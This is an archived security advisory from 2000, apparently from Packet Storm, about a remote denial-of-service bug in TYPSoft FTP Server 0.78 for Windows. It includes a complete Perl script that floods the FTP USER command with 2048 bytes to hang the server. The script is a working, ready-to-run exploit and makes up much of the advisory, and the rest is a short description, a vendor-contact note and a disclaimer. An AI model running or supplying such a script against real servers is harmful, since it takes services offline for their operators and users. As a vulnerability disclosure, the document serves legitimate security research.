what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

typsoft-ftpd.txt

typsoft-ftpd.txt
Posted Sep 12, 2000
Authored by Dethy | Site synnergy.net

TYPSoft FTP Server 0.78 for Windows 9X and WinNT is vulnerable to a denial of service attack. Sending a long user or pass commands causes the server to hang and increase system resources. Perl exploit included.

tags | exploit, denial of service, perl
systems | windows
SHA-256 | 6290ed9092ce73d9e92df721518efe218bf3ccf081ac7b79d93e84f30cccd104

typsoft-ftpd.txt

Change Mirror Download

*******************************************
+ TYPSoft FTP Server remote DoS Problem +
*******************************************
# Advisory by dethy #
# www.synnergy.net #
|=========================================|

Advisory # 12

Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]
Systems : Win9X, WinNT
Product : http://www.multimania.com/typsoft/
Discovery : dethy@synnergy.net

" Another trivial bug. "

Description
-----------

TYPSoft FTP is a Freeware FTP server, with all the necessary
features to facilitate beginners and advanced users.


Vulnerability
-------------

TYPSoft FTP Server does not correctly deal with long commands
over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',
'cwd', etc, causing the server to hang and increase system resources.
The process will not be active until it is manually restarted.


Exploit
-------

simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.

================<cut>==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");

sub usage {die("\n$0 -s <server>\n\n");}
================</cut>====================

Solution
--------

The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version
comes out or use an alternative product.


Disclaimer
----------

Synnergy Networks may not be held liable for the use and/or potential effects of these
programs or advisories, nor the content contained within. Use them at your own risk.

---------------------------------------------------------------------------------------
Web : http://www.synnergy.net
E-Mail : dethy@synnergy.net

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close